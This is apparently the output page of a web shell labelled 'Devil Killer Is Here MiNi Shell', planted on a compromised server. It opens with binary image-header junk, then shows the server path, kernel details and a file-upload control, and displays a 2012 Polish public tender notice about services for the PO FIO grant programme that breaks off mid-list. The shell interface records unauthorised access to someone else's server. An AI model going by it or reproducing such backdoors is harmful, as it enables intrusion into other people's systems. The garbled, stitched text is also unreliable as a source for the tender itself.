JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121224/271851-N-2012.html

<p class="kh_header"><b>Warszawa: Czynności związane z obsługą Programu Operacyjnego Fundusz Inicjatyw Obywatelskich</b><br>
<b>Numer ogłoszenia: 271851 - 2012; data zamieszczenia: 24.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rozwoju Zasobów Ludzkich , Aleje Jerozolimskie 65/79, 00-697 Warszawa, woj. mazowieckie, tel. 22 237 00 00, faks 22 237 00 99.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka podległa MPiPS.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Czynności związane z obsługą Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A
Usługa polegająca na koordynacji zadań wynikających z  Porozumienia w sprawie powierzenia obsługi części działań związanych z realizacją Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.

Zakres zamówienia:
Koordynacja zadań wynikających z  Porozumienia w sprawie powierzenia obsługi części działań związanych z realizacją Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w latach 2009 - 2013 numer BAB/27/03/2009/UCP/DPP z dnia 19 lutego 2009 rokuw szczególności: 
1.	Obsługa Programu Operacyjnego Fundusz Inicjatyw Obywatelskich - poprzez koordynację działań związanych z przygotowaniem przez CRZL i zawarciem umów przez CRZL z osobami zajmującymi się obsługą PO FIO (sekcja FIO w Centrum Rozwoju Zasobów Ludzkich) oraz wypłaceniem wynagrodzeń za wykonaną pracę, a także zapewnienie odpowiednich warunków pracy, w tym w szczególności: siedziby, sprzętu, materiałów biurowych oraz dostępu do telefonów i internetu na potrzeby Sekcji FIO.
2.	Modyfikacja generatora
3.	Przydzielenie ekspertom ofert zarejestrowanych w generatorze on-line (1 oferty do 2 ekspertów) zgodnie z metodologią określoną przez DPP oraz poinformowanie ekspertów o przydzielonych ofertach,
4.	Współpraca z wykonawcą generatora sprawozdań w zakresie modyfikacji części sprawozdawczej generatora.
5.	Koordynacja  podejmowanych działań w ramach PO FIO 2012 zgodnie z zawartym Porozumieniem w tym w szczególności:
a)	obsługa infolinii dla oferentów w ogłoszonych konkursach
b)	nadzór nad rejestracją wniosków w generatorze on-line
c)	odbierania wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie CRZL
d)	rejestracji wniosków w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków,
e)	przygotowania umów z wyznaczonymi przez DPP MPiPS ekspertami do oceny merytorycznej,
f)	odebrania kart oceny merytorycznej w wersji papierowej i przyporządkowanie ich w segregatorach do poszczególnych ekspertów,
g)	przeprowadzenia weryfikacji formalnej wpływających ofert zgodnie z Zasadami Przyznawania i Rozliczania Dotacji w ramach PO FIO 2013. 
h)	współpracy z  Instytucją Zarządzającą przy rozpatrywaniu odwołań od wyników oceny formalnej w ramach PO FIO 
i)	weryfikacji nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
j)	wysyłania drogą elektroniczną informacji dotyczących procedury zawarcia umowy o dofinansowanie w ramach PO FIO 2013.
k)	weryfikacji nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
l)	przekazywania do Departamentu Pożytku Publicznego MPiPS gotowych projektów umów o dofinansowanie w ramach PO FIO 2013.
m)	przekazywania do DPP wygenerowanych z bazy danych wypełnionych wydruków formularzy projektów umów o dofinansowanie projektów po zweryfikowaniu ich prawidłowego wypełnienia
n)	współpracy z DPP przy realizacji procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO,
o)	współpracy przy działaniach promocyjnych PO FIO, zgodnie z Planem Komunikacji na lata 2009-2013 oraz Planem informacji i promocji na 2013 r.,
p)	przekazywania do DPP posiadanych przez CRZL informacji służących  do sporządzenia raportów z realizacji PO FIO dla Ministra, Komitetu Monitorującego, Rady Działalności Pożytku Publicznego i innych podmiotów.
q)	weryfikacji harmonogramu realizacji zadań i terminowości ich wykonywania,
r)	przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą 
s)	przygotowania do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013
6.	Sporządzanie sprawozdań i raportów okresowych do Instytucji Zarządzającej zgodnie z harmonogramem i zakresem Porozumienie nr BAB/27/03/2009/KCP/DPP z dnia 19 lutego 2009 r.
7.	Przygotowywanie zapotrzebowań dotyczących uruchomienia środków finansowych w ramach PO FIO zgodnie z obowiązująca procedurą CRZL.

Część B
Usługa polegająca na obsłudze konkursu oraz organizacja działań promocyjnych Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.

Zakres zamówienia: 
Obsługa konkursu (70% czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla oferentów w ogłoszonym konkursie 
2.	Rejestracja wniosków w generatorze on-line,
3.	Odbieranie wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie crzl
4.	Rejestracja wniosków w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków,
5.	Odebranie kart ocen w wersji elektronicznej w generatorze ofert oraz weryfikacja kart ocen złożonych przez epuap, które zostaną przekazane przez dpp na elektronicznym nośniku danych,
6.	Weryfikacja ocen ekspertów, danych złożonych przez oferentów oraz innych informacji zapisanych generatorze. Weryfikowanie ocen ekspertów w kwestii kryteriów formalnych oraz nanoszenie poprawek na pisemną lub mailową prośbę organizacji
7.	Przeprowadzenie weryfikacji formalnej wpływających ofert zgodnie z zasadami przyznawania i rozliczania dotacji w ramach po fio 2013. 
8.	Współpraca z  instytucją zarządzającą przy rozpatrywaniu odwołań od wyników oceny formalnej w ramach po fio 
9.	Poinformowanie pocztą elektroniczną wnioskodawców, którym minister przyznał dofinansowanie (zgodnie z ogłoszonymi wynikami konkursu), o przyznaniu dotacji i ewentualnej konieczności modyfikacji harmonogramu lub kosztorysu
10.	Weryfikacja nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
11.	Wysyłanie drogą elektroniczną informacji dotyczących procedury zawarcia umowy o dofinansowanie w ramach po fio 2013.
12.	Weryfikacja nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
13.	Przekazywanie do departamentu pożytku publicznego mpips gotowych projektów umów o dofinansowanie w ramach po fio 2013.
14.	Wprowadzanie niezbędnych danych do generatora ofert.
15.	Przeprowadzenie wizyt monitorujących stan realizacji projektów dofinansowanych w ramach po fio 2012 i po fio 2013 na podstawie listy organizacji wytypowanych przez instytucję zarządzającą .

Organizacja działań promocyjnych Programu Operacyjnego Fundusz Inicjatyw Obywatelskich (25% czasu wykonywanych zadań zleconych):
1.	Realizację działań promocyjnych PO FIO, zgodnie z Planem Komunikacji oraz Planem informacji i promocji na rok 2013,
a.	Przekazywanie do konsultacji i akceptacji DPP projektów / koncepcji materiałów informacyjnych i promocyjnych, 
b.	Realizacja uzgodnionych działań promocyjnych.
2.	Realizację działań promocyjnych zgodnie z harmonogramem Planu Informacji i Promocji na rok 2013, w tym udział w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO.
3.	Przygotowanie raportów częściowych oraz raportu końcowego z realizacji działań promocyjnych przez CRZL dla Ministerstwa Pracy i Polityki Społecznej.

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013.


Część C 
Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu.

Zakres zamówienia: 
Przeprowadzenia procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO (70% czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla Zleceniobiorców  rozliczających dotację. 
2.	Przygotowanie umów dla ekspertów analizujących  sprawozdania z realizacji zadań dofinansowanych w ramach PO FIO 2012-2013.
3.	Przekazanie ekspertom dokumentacji sprawozdawczej zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
4.	Odebranie od ekspertów - kart ocen w wersji elektronicznej w generatorze sprawozdań on-line oraz w wersji papierowej.
5.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
6.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO. 
7.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
8.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
9.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
10.	Sporządzenie informacji o organizacjach, które nie złożyły sprawozdań w wersji elektronicznej w Generatorze w  ramach Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
11.	Podejmowanie próby kontaktu telefonicznego i e-mailowego z beneficjentami  w celu przesłania brakującego sprawozdania.
12.	Sporządzanie dla Instytucji Zarządzającej listy organizacji, które nie rozliczyły dotacji wraz z opisem stanu sprawy w celu przeprowadzenia postępowania administracyjnego.
13.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013.

Obsługa konkursu (25 % czasu wykonywanych zadań zleconych):
1.	Weryfikację nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
2.	Weryfikację nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
3.	Przekazywanie do departamentu pożytku publicznego mpips gotowych projektów umów o dofinansowanie w ramach po fio 2013.
4.	Przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach po fio 2012 i po fio 2013 na podstawie listy organizacji wytypowanych przez instytucję zarządzającą .

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013. 


Część D 
Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu.
Zakres zamówienia: 
Przeprowadzenia procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO poprzez (70% czasu wykonywanych zadań zleconych):
1.	Przekazanie ekspertom dokumentacji sprawozdawczej zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
2.	Odebranie od ekspertów - kart ocen w wersji elektronicznej w generatorze sprawozdań on-line oraz w wersji papierowej. 
3.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
4.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
5.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
6.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
7.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
8.	Sporządzenie informacji o organizacjach, które nie złożyły sprawozdań w wersji elektronicznej w Generatorze w  ramach Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
9.	Podejmowanie próby kontaktu telefonicznego i e-mailowego z beneficjentami  w celu przesłania brakującego sprawozdania.
10.	Sporządzanie dla Instytucji Zarządzającej listy organizacji, które nie rozliczyły dotacji wraz z opisem stanu sprawy w celu przeprowadzenia postępowania administracyjnego.
11.	Prowadzenie rejestrów rozliczonych umów.
12.	Obsługa infolinii dla Zleceniobiorców  rozliczających dotację. 
13.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013.

Obsługa konkursu (25 % czasu wykonywanych zadań zleconych):
1.	Weryfikację nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
2.	Weryfikację nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
3.	Przekazywanie do Departamentu Pożytku Publicznego mpips gotowych projektów umów o dofinansowanie w ramach PO FIO 2013.
4.	Przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą .

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013.


Część E 
Usługa polegająca na wsparciu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO - 5 miesięcy 

Zakres zamówienia: 
Wsparcie procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO:
1.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
2.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
3.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
4.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
5.	Prowadzenie rejestrów rozliczonych umów.
 

Część F 
Usługa polegająca na obsłudze administracyjno - logistycznej oraz wsparciu obsługi konkursu i rozliczenia dotacji PO FIO.

Zakres zamówienia: 
Obsługa administracyjno - logistyczna Programu Operacyjnego Fundusz Inicjatyw Obywatelskich (60 % czasu wykonywania zadań zleconych):
1.	Opracowywanie zapytań ofertowych w zakresie usług i materiałów niezbędnych do zakupu na potrzeby Sekcji FIO
2.	Opracowanie i przygotowanie dokumentacji niezbędnej do realizacji zakupu usług i materiałów na potrzeby Sekcji FIO
3.	Prowadzenie wykazu  i rejestru spraw prowadzonych przez Sekcję FIO,
4.	Porządkowanie i opisanie przechowywanych przez Sekcję FIO dokumentów
5.	Zapewnienie właściwego obiegu dokumentów zgodnie z Regulaminem Organizacyjnym CRZL .
6.	Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO, w tym przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013.
7.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013

Obsługa konkursu (30 % czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla oferentów w ogłoszonych konkursach.
2.	Nadzór nad rejestracją wniosków w generatorze on-line.
3.	Odbieranie wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie CRZL.
4.	Nadanie numeru identyfikacyjnego (numer FIO) i rejestracja ofert w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków.
5.	Odebranie kart ocen w wersji elektronicznej w generatorze ofert oraz weryfikacja kart ocen złożonych przez ePUAP, które zostaną przekazane przez DPP na elektronicznym nośniku danych.
6.	Weryfikacja ocen ekspertów, danych złożonych przez oferentów oraz innych informacji zapisanych Generatorze. Weryfikowanie ocen ekspertów w kwestii kryteriów formalnych oraz nanoszenie poprawek na pisemną lub mailową prośbę organizacji.
7.	Poinformowanie pocztą elektroniczną wnioskodawców, którym Minister przyznał dofinansowanie (zgodnie z ogłoszonymi wynikami konkursu), o przyznaniu dotacji i ewentualnej konieczności modyfikacji harmonogramu lub kosztorysu.
8.	przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą .

Rozliczenie dotacji (10% czasu wykonywanych zadań zleconych):
1.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
2.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
3.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
4.	Prowadzenie rejestrów rozliczonych umów.


Część G 
Usługa polegająca na obsłudze  finansowo - księgowej Programu Operacyjnego Fundusz Inicjatyw Obywatelskich. 

Zakres zamówienia: 
1.	Wprowadzania dokumentów do ewidencji księgowej.
2.	Współpraca w przygotowywaniu załączników dot. zaangażowania środków zawartych umów cywilnoprawnych.
3.	Prowadzenie ewidencji pozabilansowej.
4.	Uzgodnienie zapisów księgowych.
5.	Przygotowywanie sprawozdań RB-28, RB-23,RB-27,RB-N,RB-Z.
6.	Przygotowywanie umów cywilno - prawnych 
7.	Prowadzenie rejestru zawartych umów cywilno - prawnych 
8.	Weryfikacja dokumentów niezbędnych do wprowadzenie do systemu QNT.
9.	Sporządzanie miesięcznego zestawienia wprowadzonych do systemu QNT umów.
10.	Przyjmowanie rachunków.
11.	Sporządzanie list płac.
12.	Dokonywanie rozliczeń z Urzędem Skarbowym. 
13.	Dokonywanie rozliczeń z ZUS-em (sporządzanie i przekazywanie deklaracji rozliczeniowych.
14.	Obsługa budżetowa PO FIO.
15.	Rejestracja zapotrzebować z PO FIO i angażowanie środków.
16.	Przygotowywanie dokumentów dotyczących zmian paragrafów środków przekazanych na realizację obsługi PO FIO przez CRZL z rezerw celowych budżetu państwa.
17.	Weryfikacja i uzgodnienia paragrafów budżetowych na zapotrzebowaniach składanych przez Sekcję FIO.
18.	Sporządzania zapotrzebowań na środki finansowe do MPiPS, MF.
19.	Wyjaśniania nieprawidłowości związanych z dokumentami księgowymi z kontrahentami..
20.	Parafowania dokumentów pod względem formalno - rachunkowym.
21.	Dokonywania przelewów na podstawie dokumentów zatwierdzonych pod względem merytorycznym i finansowo - księgowym.
22.	Przygotowywania dokumentacji związanej z płatnościami i przekazywanie do Wydziału Księgowości.


Część  H 
Usługa polegająca na obsłudze prawnej procesu wdrażania Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w Centrum Rozwoju Zasobów Ludzkich. 

Zakres zamówienia: 
Obsługa prawna procesu wdrażania Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w Centrum Rozwoju Zasobów Ludzkich w roku 2012 poprzez:
1.	Sporządzanie projektów umów,
2.	Opiniowanie projektów umów, 
3.	Opiniowanie dokumentacji merytorycznej, 
4.	Sporządzanie opinii w zakresie wdrażania PO FIO w CRZL
5.	Konsultacje prawne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3, 97.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

W Cz. A. -  Usługa polegająca na koordynacji zadań wynikających z  Porozumienia w sprawie powierzenia obsługi części działań związanych z realizacją Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	wykształcenie wyższe,
b)	minimum 3 lata doświadczenia w pracy, której przedmiotem były zagadnienia społeczne lub/i związane z funkcjonowaniem organizacji pozarządowych,
c)	minimum 3 lata doświadczenie w pracy w instytucjach finansów publicznych lub/i organizacji pozarządowych,
d)	minimum 2 lata doświadczenia w realizacji programów /projektów  finansowanych z różnych źródeł lub kierowanie zespołem osób,
e)	doświadczenie w dokonywaniu oceny ofert złożonych w procedurze konkursu otwartego/zamkniętego,
f)	doświadczenie w zakresie zarządzania środkami publicznymi, w tym znajomość klasyfikacji budżetowej.
